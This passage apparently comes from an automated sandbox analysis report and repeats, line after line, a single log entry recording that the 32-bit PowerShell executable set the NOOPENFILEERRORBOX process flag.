            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
